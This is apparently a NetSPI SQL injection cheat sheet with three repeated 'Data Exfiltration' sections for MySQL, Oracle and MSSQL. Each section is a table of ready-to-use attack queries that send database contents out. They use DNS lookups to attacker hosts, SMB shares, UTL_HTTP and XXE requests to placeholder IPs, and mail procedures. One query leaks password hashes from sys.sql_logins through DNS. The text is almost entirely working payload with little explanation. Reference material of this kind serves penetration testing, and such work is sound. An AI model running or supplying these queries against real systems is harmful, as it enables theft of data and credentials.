Data Exfiltration
Exfiltrating data allows easier data analysis, as well as an offline copy of any compromised data. Data can be exfiltrated through files, various layer 4 requests, and hidden techniques.
* Requires privileged user
| Description | Query |
|---|---|
| DNS Request | SELECT LOAD_FILE(concat('\\\\',(QUERY_WITH_ONLY_ONE_ROW), '.yourhost.com\\')) |
| SMB Share | SELECT * FROM USERS INTO OUTFILE '\\attacker\SMBshare\output.txt' |
| HTTP Server | SELECT * FROM USERS INTO OUTFILE '/var/www/html/output.txt' |
| Numeric Concatenation | SELECT length(user()) SELECT ASCII(substr(user(),1)) When data can only be exported as numbers, convert to ASCII. For automation see here. |
Data Exfiltration
Exfiltrating data allows easier data analysis, as well as an offline copy of any compromised data. Data can be exfiltrated through files, various layer 4 requests, and hidden techniques.
* Requires privileged user
| Description | Query |
|---|---|
| Combine multiple lines into one | SELECT dbms_xmlgen.getxmltype('select user from dual') FROM dual |
| XML External Entity | SELECT xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://IP/test"> %remote; %param1;]>') FROM dual; |
| URL_HTTP Request (Pre-11gR2) | SELECT UTL_HTTP.request ('http://IP/test') FROM dual; |
| Escaping special characters | SELECT UTL_URL.escape('http://IP/' || USER) FROM dual; |
Data Exfiltration
Exfiltrating data allows easier data analysis, as well as an offline copy of any compromised data. Data can be exfiltrated through files, various layer 4 requests, and hidden techniques.
Note: It is possible to make a DNS request from MSSQL. However, this request requires administrator privileges and SQL Server 2005.
| Description | Query |
|---|---|
| Make DNS Request | DECLARE @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.netspi.com' from sys.sql_logins; exec('xp_fileexist "\' + @host + 'c$boot.ini"'); |
| UNC Path (DNS Request) |
xp_dirtree '\\data.domain.com\file' The UNC Path Injection Cheatsheet can be found here. |
| Enable sp_send_dbmail and send query | sp_configure 'show advanced options', 1;RECONFIGURE;sp_configure 'Database Mail XPs', 1;RECONFIGURE;exec msdb..sp_send_dbmail @recipients='harold@netspi.com',@query='select @@version'; |
| Basic xp_sendmail Query | EXEC master..xp_sendmail 'harold@netspi.com', 'This is a test.' |
| Send Full Email with xp_sendmail | EXEC xp_sendmail @recipients='harold@netspi.com', @message='This is a test.', @copy_recipients='test@netspi.com', @subject='TEST' |
| Send Query Results Via xp_sendmail | EXEC xp_sendmail 'harold@netspi.com', @query='SELECT @@version'; |
| Send Query Results as Attachment Via xp_sendmail | CREATE TABLE ##texttab (c1 text) INSERT ##texttab values ('Put messge here.') DECLARE @cmd varchar(56) SET @cmd = 'SELECT c1 from ##texttab' EXEC master.dbo.xp_sendmail 'robertk', @query = @cmd, @no_header='TRUE' DROP TABLE ##texttab |
© 2024 Copyright by NetSPI. All rights reserved.